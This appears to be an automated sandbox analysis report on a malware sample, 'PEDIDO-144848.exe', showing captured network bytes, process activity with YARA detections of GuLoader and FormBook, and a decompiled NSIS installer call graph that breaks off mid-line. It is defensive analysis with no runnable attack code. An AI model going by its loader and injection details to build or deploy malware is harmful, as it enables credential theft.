                                                      Data Ascii: *}{~r;Faoy7HZ(.l8=>Yb#9Hxc@mJ7,lUglm$,(-neK;$8D;6,!6p-jj_6_"SPpG~? )yA<OayQ}i+FTKD77-6!.#*i/>I|*yihc[j~d)n^"GVSI%
                                                      2024-10-07 17:26:00 UTC4885INData Raw: c9 4b c7 b8 bc 04 86 b8 dd da 7f 71 b5 b0 30 e3 0c f5 16 9d 37 ab 04 aa 07 fc ae 4a 6a e0 3e 7c 27 c3 ec 75 14 cb 4d 8b f6 63 8f ff d2 1a a6 a0 e9 3a a9 a9 b8 31 b0 f1 04 29 06 a7 be 95 d9 c2 60 ba 1e 9d 6d a4 79 6d 4d 28 14 20 32 b7 bf 5c 97 44 e3 9d 90 a1 50 7b 08 02 fb 75 4a 0b 11 e0 65 3e b0 e2 18 f9 cc 84 48 98 e0 60 aa 41 2b 29 79 80 8a 53 2e 4f fe 33 f1 e5 96 e6 01 8e 28 06 56 23 fc 59 36 50 4d 97 2a 90 25 8e 06 d7 f7 3f 55 ea c3 05 20 52 c2 78 0c 59 94 99 21 b4 67 08 21 c3 e2 3a 0c 35 8d 59 73 20 65 ff 1c 32 2c 6d bd 3b d0 18 d8 67 a1 e4 4d 00 80 b4 09 7c e7 85 b2 62 3c 26 f7 e5 3f 50 d0 68 e1 79 6f 20 f5 e6 6c b9 19 c5 e3 cd 5c 4b 8d b7 10 dd 9c 09 3c 5c 52 e1 d6 76 e6 ce 3e d1 f7 82 c0 7b 5e 6d 00 34 8d e0 2f c0 29 e1 b2 d8 31 b9 ac 49 62 8f 8c
                                                      Data Ascii: Kq07Jj>|'uMc:1)`mymM( 2\DP{uJe>H`A+)yS.O3(V#Y6PM*%?U RxY!g!:5Ys e2,m;gM|b<&?Phyo l\K<\Rv>{^m4/)1Ib
                                                      2024-10-07 17:26:00 UTC47INData Raw: 88 33 b8 43 8e fe 8e 7e 3d 55 65 a7 4e b3 8f 9a f0 59 b4 4c be 29 55 df 2c a3 77 bd 81 02 88 e0 82 0f 8e 82 26 36 38 5e 3a b2 7f 55 19 8d f9
                                                      Data Ascii: 3C~=UeNYL)U,w&68^:U
                                                      2024-10-07 17:26:00 UTC1255INData Raw: 86 e4 a8 5c 92 1e 09 64 e6 52 23 75 e1 9b 93 ad da 23 a0 a8 63 17 ca b1 8b 3d 89 b4 17 f1 ce c7 86 54 77 94 ff 29 6e 98 0e e6 4f 36 88 0d dd af a7 f2 7c 9c 60 c4 8d 16 fe 86 db 8e bb 6f 9e c5 dc 59 fd 60 68 70 0d f1 5a 9a 5a 8a 66 b8 b5 2d 6d c6 fb 15 84 84 50 27 89 a8 19 f2 36 71 87 c2 eb b9 14 af 36 10 e6 46 73 eb 9b f7 ed 2c 53 8f c0 e4 ba 0e d4 01 58 22 b4 ef af 24 0c 2a 7a e6 08 80 79 16 7d eb 36 5e a5 15 da cc 6d 36 05 96 b4 de 25 67 0a f3 66 14 2d 90 1f 45 b7 91 f8 66 f6 f5 49 e2 34 b5 2c 2e 40 43 b2 3b 00 9e 83 38 d7 44 10 89 36 2c c7 32 71 a6 0b 6d 5c e8 43 6a 34 fb 7c 5d 60 d3 05 6a 06 12 b1 1c e6 8b 66 8a 59 6a fd 48 52 bf 1c 82 b7 e1 19 e3 68 e7 ef 10 58 52 fe 24 75 93 65 be a4 ce bf dd 57 19 ff bd a5 f8 c7 42 76 dc 77 04 f6 8d 49 b6 eb aa 6a
                                                      Data Ascii: \dR#u#c=Tw)nO6|`oY`hpZZf-mP'6q6Fs,SX"$*zy}6^m6%gf-EfI4,.@C;8D6,2qm\Cj4|]`jfYjHRhXR$ueWBvwIj
                                                      2024-10-07 17:26:00 UTC64INData Raw: 7d 91 1c 6c 5d 64 33 9e 13 f1 d0 a5 b9 c1 3b 7e f8 9f 73 38 d7 44 ee 83 9d 86 6d 9b 7e 4c 8f e3 5f 49 29 9e 7d 33 7c a4 2e 40 8e ac a6 ab f8 1e 58 6c a1 d9 43 ef 83 35 8f 01 a8 e4 e7 a4 a0 61
                                                      Data Ascii: }l]d3;~s8Dm~L_I)}3|.@XlC5a
                                                      2024-10-07 17:26:00 UTC1255INData Raw: 10 62 9d a9 c5 92 7c ff fe f3 23 83 e0 f4 b7 d2 f9 d9 16 a2 1f 52 bb a9 fd 33 18 8f bb 75 78 dc 17 2f b8 85 52 85 5b a9 99 36 68 93 21 2e a9 22 6b bc c7 57 09 55 c8 33 80 fd 0e 43 b8 cd 8a ef 79 70 61 29 e6 01 83 ce c9 f7 07 ac b9 a5 7f 26 a2 67 ec 64 9d 7b 42 66 a1 f2 de 65 ef 0c 5e ec 71 45 21 b3 ec 78 47 d2 72 55 8e 8c e5 3f 62 1d 64 bd 82 16 77 c9 26 0a 51 d3 26 ac c0 9d 8f c2 be 97 76 99 f4 d9 2a 17 5c 28 82 1c fa f6 d0 76 2d 07 21 6f c4 e8 ce a3 a4 f9 03 7a 5e 9c 6f 70 52 4e 8a 25 4f a6 36 ce f8 aa 09 d6 c1 46 a0 26 38 67 b9 d9 8a 54 69 e8 c6 39 c4 99 ce d1 a5 86 16 a5 e3 cc 7c 03 01 62 a9 4e 1c a1 be 03 47 b8 f1 02 96 1c 91 9b cf 77 f0 da 3d f9 53 df 6e f8 3d 71 ee a9 23 1a 55 55 b9 6b c2 71 7f 57 af 1b 39 e7 30 20 0f 40 72 d8 cf ce 09 82 ff b7 fe
                                                      Data Ascii: b|#R3ux/R[6h!."kWU3Cypa)&gd{Bfe^qE!xGrU?bdw&Q&v*\(v-!oz^opRN%O6F&8gTi9|bNGw=Sn=q#UUkqW90 @r
                                                      2024-10-07 17:26:00 UTC1255INData Raw: b2 5d 95 72 91 f9 b6 f4 11 bd 80 9b 07 99 7c 3f 4a 2e b4 e5 e9 58 0d 08 aa 80 19 db 45 d5 d4 c5 d7 b3 3f f3 e2 2e f1 83 5d 39 d4 32 9a b1 ed 11 ca 75 45 08 dd ea 58 89 45 64 bb ab 5e 24 2d 62 53 df e3 5c a1 74 30 d7 6b d0 27 94 43 6e 46 c4 fb 40 fa 6d 37 19 98 a3 b4 f0 d9 5c 16 a7 7f 47 1f 4a ba 44 21 b5 11 31 30 d1 03 97 aa b4 f6 d1 8b a2 e0 8f d7 b6 19 aa a2 a5 0c 09 0c d7 9b 38 73 2c ea fc e3 44 6a 60 56 03 e4 02 12 9a 2f e2 8d 91 e8 0d 64 40 e6 a0 2b f8 92 f4 10 f7 fe 1b a9 be c0 20 22 57 a2 2e f7 99 4c 40 97 9d 3f 65 45 2e 0c 76 7c e0 46 64 3b 6a d7 b0 cd d7 8f 35 ae b3 1d 30 17 68 d9 ba 40 fd 16 86 94 4c 3b 13 b5 31 b1 df b0 49 96 56 c1 79 6f 27 bf 38 7b d2 c3 c6 c6 b5 48 c4 0b dd 14 f7 59 61 64 96 ca 2c c0 3c 7b 56 ef 65 a9 36 b0 27 e9 4a ec de 5a
                                                      Data Ascii: ]r|?J.XE?.]92uEXEd^$-bS\t0k'CnF@m7\GJD!108s,Dj`V/d@+ "W.L@?eE.v|Fd;j50h@L;1IVyo'8{HYad,<{Ve6'JZ
                                                      2024-10-07 17:26:00 UTC1255INData Raw: 08 88 bf e5 66 f4 7e f6 bc 1c da ae 81 51 72 85 ea 1f 09 cc 31 25 0b 3d a2 e8 46 ef 7e 25 a9 cf 47 35 3c 92 59 e7 2e cf c7 22 49 b1 c8 7f 81 c4 50 48 c0 e8 08 b8 bd f3 b8 a0 1c 22 95 38 e4 67 df 73 cb 47 be b1 02 03 eb 7e b9 da be 20 d3 76 a0 18 02 1d a0 b6 7a 19 ae d9 57 fc 4f ac a4 21 c5 55 83 a3 b1 ae 53 bb 67 d0 a4 01 a8 de 95 1b 64 54 ed c8 28 af e2 24 15 35 e5 24 c5 27 b7 08 4e 04 e7 79 43 61 fd 02 63 70 23 12 46 64 25 43 44 99 09 92 f8 09 76 a3 54 99 07 4b ce eb 42 57 e8 36 a7 e5 92 79 0f e2 40 c6 4f 23 ab d4 80 be 2c 34 1d e4 ef b5 ff ea 6f 9b e1 4e 5c 5b ca 68 04 93 07 99 db a5 f2 84 ec 4a cd a7 f6 c4 6e 8c 17 fd 33 8c b5 48 19 63 de 4b f6 8a 3d 60 5c 6c 0c fe 5a 29 ea c0 a6 12 90 32 f2 22 27 b1 97 61 8a d1 0b 26 3e 4a 82 be 78 a3 6f 10 1f 97 1d
                                                      Data Ascii: f~Qr1%=F~%G5<Y."IPH"8gsG~ vzWO!USgdT($5$'NyCacp#Fd%CDvTKBW6y@O#,4oN\[hJn3HcK=`\lZ)2"'a&>Jxo
                                                      2024-10-07 17:26:00 UTC1255INData Raw: 3d 5a a7 56 89 11 49 2d 34 e3 ca b1 5e 6b 57 89 23 66 1b 1d f1 3e fe 8a a8 75 ea 31 9b a6 7c b9 7e b4 5e 1e d2 f7 1c b4 4e 95 12 bf 34 4a af 19 7c a4 07 2a ab 39 56 39 03 28 4d 68 2d 91 11 15 f7 07 5e 7c f8 12 b5 cf fd 52 1c 3a e6 d1 77 75 fe d2 54 39 61 ef 82 2b bb af c4 7f d0 be 6f c5 0e c2 88 f2 1a 24 18 44 e2 01 a4 f4 fb 10 c1 06 d6 98 91 80 6d ec b3 44 49 e7 22 29 33 91 dd ae 76 ae 3d ec f1 db 14 db 42 d3 00 a9 5f 05 ab 9e 71 74 a6 19 c5 c3 5b 5f 30 a6 92 86 f9 04 0c f2 27 5a fc cf 57 ad 8a ac b0 5a fa b3 4a 7b 73 bc a3 3b e5 77 66 bb 13 6e b0 86 a7 0e c9 89 37 1c ce dd 70 ab 48 4c 5f 1e b1 38 ee a0 e0 01 90 5a b0 ee d9 43 4a df 22 48 40 02 6b 60 4f 36 bc 13 9c 83 83 29 f4 3c 14 03 81 ce 0b d0 32 14 aa c3 58 61 18 5b 64 be a0 2c ea 50 02 6e ef 58 a0
                                                      Data Ascii: =ZVI-4^kW#f>u1|~^N4J|*9V9(Mh-^|R:wuT9a+o$DmDI")3v=B_qt[_0'ZWZJ{s;wfn7pHL_8ZCJ"H@k`O6)<2Xa[d,PnX
                                                      2024-10-07 17:26:00 UTC1255INData Raw: 61 cb 59 2a a7 61 c1 79 3c 00 c7 15 79 de 6c aa 22 89 a2 a7 35 49 d9 e8 df 7a b4 8a 97 d0 d2 6e b1 1a 99 d2 38 0b e0 55 93 21 08 17 1b 07 f6 2e 3d 05 2b f4 7c d5 ea 2a 4a 84 b6 11 ad 20 d4 ca 9c dd 75 a7 b5 15 2c 38 1c c2 bd e9 e7 4d 77 5f 10 fd 7d 3c 60 8c 90 35 bc 69 fc 85 15 30 f7 41 6d 61 0a 6c 17 69 01 72 a7 c9 07 ed 47 14 91 9b 4d 23 61 e7 12 04 0d b7 f5 4d 8b 4d 68 8c b5 ae 16 e9 2c c6 c7 d7 f9 ab bf e6 18 e3 f2 2e 8d c8 c3 ee 18 c9 80 f5 bf 75 df e4 33 2b 8e 0e 4b 80 38 25 c5 77 97 64 01 62 cd 8f 4a 72 ae 4d 51 0a 15 37 34 1b e7 34 40 06 f5 4b 68 4a 40 6e 95 f8 10 eb f3 90 54 c2 e5 dc a9 fe 04 dc e4 39 7f af b6 40 ae 7f 22 2b 33 10 3c a3 22 cc 33 5c 1a 99 dd 9c 28 ab c5 32 b9 85 5a 93 09 bb df a0 fc 2e 5d df 07 8b bb d0 9c d9 18 42 ed a3 cd 0f d2
                                                      Data Ascii: aY*ay<yl"5Izn8U!.=+|*J u,8Mw_}<`5i0AmalirGM#aMMh,.u3+K8%wdbJrMQ744@KhJ@nT9@"+3<"3\(2Z.]B


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:13:23:41
                                                      Start date:07/10/2024
                                                      Path:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\PEDIDO-144848.exe"
                                                      Imagebase:0x400000
                                                      File size:614'672 bytes
                                                      MD5 hash:0D9F261233DF472092FBFBB1E982BBE7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.115152353454.0000000002ED8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:13:25:45
                                                      Start date:07/10/2024
                                                      Path:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\PEDIDO-144848.exe"
                                                      Imagebase:0x400000
                                                      File size:614'672 bytes
                                                      MD5 hash:0D9F261233DF472092FBFBB1E982BBE7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.115544134516.00000000017B8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:13:26:33
                                                      Start date:07/10/2024
                                                      Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                      Imagebase:0x140000000
                                                      File size:16'696'840 bytes
                                                      MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:4
                                                      Start time:13:26:33
                                                      Start date:07/10/2024
                                                      Path:C:\Windows\SysWOW64\SecEdit.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\SecEdit.exe"
                                                      Imagebase:0x6f0000
                                                      File size:37'888 bytes
                                                      MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:13:29:07
                                                      Start date:07/10/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff6feb50000
                                                      File size:4'849'904 bytes
                                                      MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:16.6%
                                                        Dynamic/Decrypted Code Coverage:14.4%
                                                        Signature Coverage:23.2%
                                                        Total number of Nodes:1468
                                                        Total number of Limit Nodes:37
                                                        execution_graph 4624 10001000 4627 1000101b 4624->4627 4634 100014bb 4627->4634 4629 10001020 4630 10001024 4629->4630 4631 10001027 GlobalAlloc 4629->4631 4632 100014e2 3 API calls 4630->4632 4631->4630 4633 10001019 4632->4633 4636 100014c1 4634->4636 4635 100014c7 4635->4629 4636->4635 4637 100014d3 GlobalFree 4636->4637 4637->4629 4638 402241 4639 402ace 18 API calls 4638->4639 4640 402247 4639->4640 4641 402ace 18 API calls 4640->4641 4642 402250 4641->4642 4643 402ace 18 API calls 4642->4643 4644 402259 4643->4644 4645 4060a4 2 API calls 4644->4645 4646 402262 4645->4646 4647 402273 lstrlenA lstrlenA 4646->4647 4651 402266 4646->4651 4649 404fb9 25 API calls 4647->4649 4648 404fb9 25 API calls 4652 40226e 4648->4652 4650 4022af SHFileOperationA 4649->4650 4650->4651 4650->4652 4651->4648 4653 4043c3 4654 404400 4653->4654 4655 4043ef 4653->4655 4656 40440c GetDlgItem 4654->4656 4663 40446b 4654->4663 4714 40557a GetDlgItemTextA 4655->4714 4658 404420 4656->4658 4662 404434 SetWindowTextA 4658->4662 4666 4058ab 4 API calls 4658->4666 4659 40454f 4712 4046f9 4659->4712 4719 40557a GetDlgItemTextA 4659->4719 4660 4043fa 4661 40600b 5 API calls 4660->4661 4661->4654 4715 403f85 4662->4715 4663->4659 4668 405dc2 18 API calls 4663->4668 4663->4712 4671 40442a 4666->4671 4673 4044df SHBrowseForFolderA 4668->4673 4669 40457f 4674 405900 18 API calls 4669->4674 4671->4662 4678 405812 3 API calls 4671->4678 4672 404450 4675 403f85 19 API calls 4672->4675 4673->4659 4676 4044f7 CoTaskMemFree 4673->4676 4677 404585 4674->4677 4679 40445e 4675->4679 4680 405812 3 API calls 4676->4680 4720 405da0 lstrcpynA 4677->4720 4678->4662 4718 403fba SendMessageA 4679->4718 4682 404504 4680->4682 4685 40453b SetDlgItemTextA 4682->4685 4689 405dc2 18 API calls 4682->4689 4684 404464 4688 406139 5 API calls 4684->4688 4685->4659 4686 40459c 4687 406139 5 API calls 4686->4687 4695 4045a3 4687->4695 4688->4663 4690 404523 lstrcmpiA 4689->4690 4690->4685 4692 404534 lstrcatA 4690->4692 4691 4045df 4721 405da0 lstrcpynA 4691->4721 4692->4685 4694 4045e6 4696 4058ab 4 API calls 4694->4696 4695->4691 4700 405859 2 API calls 4695->4700 4701 404637 4695->4701 4697 4045ec GetDiskFreeSpaceA 4696->4697 4699 404610 MulDiv 4697->4699 4697->4701 4699->4701 4700->4695 4711 4046a8 4701->4711 4722 40483f 4701->4722 4703 40140b 2 API calls 4707 4046cb 4703->4707 4705 4046aa SetDlgItemTextA 4705->4711 4706 40469a 4725 40477a 4706->4725 4733 403fa7 EnableWindow 4707->4733 4710 4046e7 4710->4712 4734 404358 4710->4734 4711->4703 4711->4707 4737 403fec 4712->4737 4714->4660 4716 405dc2 18 API calls 4715->4716 4717 403f90 SetDlgItemTextA 4716->4717 4717->4672 4718->4684 4719->4669 4720->4686 4721->4694 4723 40477a 21 API calls 4722->4723 4724 404695 4723->4724 4724->4705 4724->4706 4726 404790 4725->4726 4727 405dc2 18 API calls 4726->4727 4728 4047f4 4727->4728 4729 405dc2 18 API calls 4728->4729 4730 4047ff 4729->4730 4731 405dc2 18 API calls 4730->4731 4732 404815 lstrlenA wsprintfA SetDlgItemTextA 4731->4732 4732->4711 4733->4710 4735 404366 4734->4735 4736 40436b SendMessageA 4734->4736 4735->4736 4736->4712 4738 40408d 4737->4738 4739 404004 GetWindowLongA 4737->4739 4739->4738 4740 404015 4739->4740 4741 404024 GetSysColor 4740->4741 4742 404027 4740->4742 4741->4742 4743 404037 SetBkMode 4742->4743 4744 40402d SetTextColor 4742->4744 4745 404055 4743->4745 4746 40404f GetSysColor 4743->4746 4744->4743 4747 404066 4745->4747 4748 40405c SetBkColor 4745->4748 4746->4745 4747->4738 4749 404080 CreateBrushIndirect 4747->4749 4750 404079 DeleteObject 4747->4750 4748->4747 4749->4738 4750->4749 4751 402844 4752 402aac 18 API calls 4751->4752 4753 40284a 4752->4753 4754 402872 4753->4754 4755 402889 4753->4755 4761 402729 4753->4761 4756 402886 4754->4756 4757 402877 4754->4757 4758 4028a3 4755->4758 4759 402893 4755->4759 4766 405cfe wsprintfA 4756->4766 4765 405da0 lstrcpynA 4757->4765 4760 405dc2 18 API calls 4758->4760 4762 402aac 18 API calls 4759->4762 4760->4761 4762->4761 4765->4761 4766->4761 4256 401746 4257 402ace 18 API calls 4256->4257 4258 40174d 4257->4258 4259 405a42 2 API calls 4258->4259 4260 401754 4259->4260 4261 405a42 2 API calls 4260->4261 4261->4260 4767 4026c7 4768 4026cd 4767->4768 4769 4026d5 FindClose 4768->4769 4770 40295e 4768->4770 4769->4770 4771 401947 4772 402ace 18 API calls 4771->4772 4773 40194e lstrlenA 4772->4773 4774 40258a 4773->4774 4775 402749 4776 402ace 18 API calls 4775->4776 4777 402757 4776->4777 4778 40276d 4777->4778 4779 402ace 18 API calls 4777->4779 4780 4059ee 2 API calls 4778->4780 4779->4778 4781 402773 4780->4781 4803 405a13 GetFileAttributesA CreateFileA 4781->4803 4783 402780 4784 402823 4783->4784 4785 40278c GlobalAlloc 4783->4785 4786 40282b DeleteFileA 4784->4786 4787 40283e 4784->4787 4788 4027a5 4785->4788 4789 40281a CloseHandle 4785->4789 4786->4787 4804 403138 SetFilePointer 4788->4804 4789->4784 4791 4027ab 4792 403122 ReadFile 4791->4792 4793 4027b4 GlobalAlloc 4792->4793 4794 4027c4 4793->4794 4795 4027f8 4793->4795 4796 402f33 32 API calls 4794->4796 4797 405aba WriteFile 4795->4797 4802 4027d1 4796->4802 4798 402804 GlobalFree 4797->4798 4799 402f33 32 API calls 4798->4799 4801 402817 4799->4801 4800 4027ef GlobalFree 4800->4795 4801->4789 4802->4800 4803->4783 4804->4791 4266 1000270b 4267 1000275b 4266->4267 4268 1000271b VirtualProtect 4266->4268 4268->4267 4808 1000180d 4809 10001830 4808->4809 4810 10001860 GlobalFree 4809->4810 4811 10001872 4809->4811 4810->4811 4812 10001266 2 API calls 4811->4812 4813 100019e3 GlobalFree GlobalFree 4812->4813 4814 4020cd 4815 402ace 18 API calls 4814->4815 4816 4020d4 4815->4816 4817 402ace 18 API calls 4816->4817 4818 4020de 4817->4818 4819 402ace 18 API calls 4818->4819 4820 4020e8 4819->4820 4821 402ace 18 API calls 4820->4821 4822 4020f2 4821->4822 4823 402ace 18 API calls 4822->4823 4824 4020fc 4823->4824 4825 40213b CoCreateInstance 4824->4825 4826 402ace 18 API calls 4824->4826 4829 40215a 4825->4829 4831 402202 4825->4831 4826->4825 4827 401423 25 API calls 4828 402238 4827->4828 4830 4021e2 MultiByteToWideChar 4829->4830 4829->4831 4830->4831 4831->4827 4831->4828 4832 4040ce 4834 4040e4 4832->4834 4837 4041f0 4832->4837 4833 40425f 4835 404333 4833->4835 4836 404269 GetDlgItem 4833->4836 4838 403f85 19 API calls 4834->4838 4842 403fec 8 API calls 4835->4842 4839 4042f1 4836->4839 4840 40427f 4836->4840 4837->4833 4837->4835 4844 404234 GetDlgItem SendMessageA 4837->4844 4841 40413a 4838->4841 4839->4835 4848 404303 4839->4848 4840->4839 4847 4042a5 6 API calls 4840->4847 4843 403f85 19 API calls 4841->4843 4845 40432e 4842->4845 4846 404147 CheckDlgButton 4843->4846 4863 403fa7 EnableWindow 4844->4863 4861 403fa7 EnableWindow 4846->4861 4847->4839 4851 404309 SendMessageA 4848->4851 4852 40431a 4848->4852 4851->4852 4852->4845 4855 404320 SendMessageA 4852->4855 4853 40425a 4856 404358 SendMessageA 4853->4856 4854 404165 GetDlgItem 4862 403fba SendMessageA 4854->4862 4855->4845 4856->4833 4858 40417b SendMessageA 4859 4041a2 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4858->4859 4860 404199 GetSysColor 4858->4860 4859->4845 4860->4859 4861->4854 4862->4858 4863->4853 4864 4028d2 4865 402aac 18 API calls 4864->4865 4866 4028d8 4865->4866 4867 40290d 4866->4867 4869 402729 4866->4869 4870 4028ea 4866->4870 4868 405dc2 18 API calls 4867->4868 4867->4869 4868->4869 4870->4869 4872 405cfe wsprintfA 4870->4872 4872->4869 4285 4023d3 4286 4023d9 4285->4286 4287 402ace 18 API calls 4286->4287 4288 4023eb 4287->4288 4289 402ace 18 API calls 4288->4289 4290 4023f5 RegCreateKeyExA 4289->4290 4291 402729 4290->4291 4292 40241f 4290->4292 4293 402437 4292->4293 4295 402ace 18 API calls 4292->4295 4294 402443 4293->4294 4302 402aac 4293->4302 4298 402462 RegSetValueExA 4294->4298 4299 402f33 32 API calls 4294->4299 4296 402430 lstrlenA 4295->4296 4296->4293 4300 402478 RegCloseKey 4298->4300 4299->4298 4300->4291 4303 405dc2 18 API calls 4302->4303 4304 402ac1 4303->4304 4304->4294 4873 401cd4 4874 402aac 18 API calls 4873->4874 4875 401cda IsWindow 4874->4875 4876 401a0e 4875->4876 4322 4014d6 4323 402aac 18 API calls 4322->4323 4324 4014dc Sleep 4323->4324 4326 40295e 4324->4326 4334 4025d7 4335 402aac 18 API calls 4334->4335 4340 4025e1 4335->4340 4336 40264f 4337 405a8b ReadFile 4337->4340 4338 402651 4343 405cfe wsprintfA 4338->4343 4339 402661 4339->4336 4342 402677 SetFilePointer 4339->4342 4340->4336 4340->4337 4340->4338 4340->4339 4342->4336 4343->4336 4367 401759 4368 402ace 18 API calls 4367->4368 4369 401760 4368->4369 4370 401786 4369->4370 4371 40177e 4369->4371 4408 405da0 lstrcpynA 4370->4408 4407 405da0 lstrcpynA 4371->4407 4374 401791 4376 405812 3 API calls 4374->4376 4375 401784 4378 40600b 5 API calls 4375->4378 4377 401797 lstrcatA 4376->4377 4377->4375 4403 4017a3 4378->4403 4379 4060a4 2 API calls 4379->4403 4380 4017e4 4381 4059ee 2 API calls 4380->4381 4381->4403 4383 4017ba CompareFileTime 4383->4403 4384 40187e 4386 404fb9 25 API calls 4384->4386 4385 401855 4387 404fb9 25 API calls 4385->4387 4404 40186a 4385->4404 4389 401888 4386->4389 4387->4404 4388 405da0 lstrcpynA 4388->4403 4390 402f33 32 API calls 4389->4390 4391 40189b 4390->4391 4392 4018af SetFileTime 4391->4392 4394 4018c1 CloseHandle 4391->4394 4392->4394 4393 405dc2 18 API calls 4393->4403 4395 4018d2 4394->4395 4394->4404 4396 4018d7 4395->4396 4397 4018ea 4395->4397 4398 405dc2 18 API calls 4396->4398 4399 405dc2 18 API calls 4397->4399 4400 4018df lstrcatA 4398->4400 4401 4018f2 4399->4401 4400->4401 4401->4404 4405 405596 MessageBoxIndirectA 4401->4405 4402 405596 MessageBoxIndirectA 4402->4403 4403->4379 4403->4380 4403->4383 4403->4384 4403->4385 4403->4388 4403->4393 4403->4402 4406 405a13 GetFileAttributesA CreateFileA 4403->4406 4405->4404 4406->4403 4407->4375 4408->4374 4877 401659 4878 402ace 18 API calls 4877->4878 4879 40165f 4878->4879 4880 4060a4 2 API calls 4879->4880 4881 401665 4880->4881 4882 401e59 4883 402ace 18 API calls 4882->4883 4884 401e5f 4883->4884 4885 402ace 18 API calls 4884->4885 4886 401e68 4885->4886 4887 402ace 18 API calls 4886->4887 4888 401e71 4887->4888 4889 402ace 18 API calls 4888->4889 4890 401e7a 4889->4890 4891 401423 25 API calls 4890->4891 4892 401e81 ShellExecuteA 4891->4892 4893 401eae 4892->4893 4894 401959 4895 402aac 18 API calls 4894->4895 4896 401960 4895->4896 4897 402aac 18 API calls 4896->4897 4898 40196d 4897->4898 4899 402ace 18 API calls 4898->4899 4900 401984 lstrlenA 4899->4900 4901 401994 4900->4901 4902 4019d4 4901->4902 4906 405da0 lstrcpynA 4901->4906 4904 4019c4 4904->4902 4905 4019c9 lstrlenA 4904->4905 4905->4902 4906->4904 4907 1000161a 4908 10001649 4907->4908 4909 10001a5d 18 API calls 4908->4909 4910 10001650 4909->4910 4911 10001663 4910->4911 4912 10001657 4910->4912 4913 1000168a 4911->4913 4914 1000166d 4911->4914 4915 10001266 2 API calls 4912->4915 4917 10001690 4913->4917 4918 100016b4 4913->4918 4916 100014e2 3 API calls 4914->4916 4919 10001661 4915->4919 4920 10001672 4916->4920 4921 10001559 3 API calls 4917->4921 4922 100014e2 3 API calls 4918->4922 4923 10001559 3 API calls 4920->4923 4924 10001695 4921->4924 4922->4919 4925 10001678 4923->4925 4926 10001266 2 API calls 4924->4926 4927 10001266 2 API calls 4925->4927 4928 1000169b GlobalFree 4926->4928 4929 1000167e GlobalFree 4927->4929 4928->4919 4930 100016af GlobalFree 4928->4930 4929->4919 4930->4919 4931 401f5d 4932 402ace 18 API calls 4931->4932 4933 401f64 4932->4933 4934 406139 5 API calls 4933->4934 4935 401f73 4934->4935 4936 401f8b GlobalAlloc 4935->4936 4937 401ff3 4935->4937 4936->4937 4938 401f9f 4936->4938 4939 406139 5 API calls 4938->4939 4940 401fa6 4939->4940 4941 406139 5 API calls 4940->4941 4942 401fb0 4941->4942 4942->4937 4946 405cfe wsprintfA 4942->4946 4944 401fe7 4947 405cfe wsprintfA 4944->4947 4946->4944 4947->4937 4948 401a5e 4949 402aac 18 API calls 4948->4949 4950 401a64 4949->4950 4951 402aac 18 API calls 4950->4951 4952 401a0e 4951->4952 4953 4036de 4954 4036e9 4953->4954 4955 4036f0 GlobalAlloc 4954->4955 4956 4036ed 4954->4956 4955->4956 4957 4026e1 4958 4026e7 4957->4958 4959 4026eb FindNextFileA 4958->4959 4961 